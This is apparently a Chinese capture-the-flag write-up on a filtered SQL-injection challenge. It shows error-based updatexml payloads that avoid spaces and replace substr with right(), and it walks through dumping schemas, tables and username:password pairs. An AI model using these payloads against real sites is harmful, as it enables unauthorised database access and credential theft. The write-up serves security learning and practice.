不要再逮了
先随便试一下
这里有报错,可以试试报错注入
抓个包,测测闭合方式
闭合方式为单引号。
然后我试了很多and 1=1 --+ ,order by 4 --+。都出现:
可以看出,做了过滤。
先用字典试一下,它的过滤字段
response是被过滤的页面,所以长度为789的都是被过滤的字段
联合注入(union),布尔盲注(ascii),时间注入(sleep)都不能用了。
但是,正如我们猜测的,报错注入但是。。。。substr被过滤了。
没有了截取函数。我们就要找到另一个函数代替-----right()从右边截取函数
right(str,length)
str:字符串
length:个数
213'or(updatexml(1,concat(0x7e,database()),1))#
213'or(updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata))),1))#
213'or(updatexml(1,right(concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata))),40),1))#
213'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like("geek")))),1))#
213'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like("H4rDsq1")))),1))#
213'or(updatexml(1,concat(0x7e,(select(group_concat(username,":",password))from(H4rDsq1))),1))#
213'or(updatexml(1,right(concat(0x7e,(select(group_concat(username,":",password))from(H4rDsq1))),40),1))#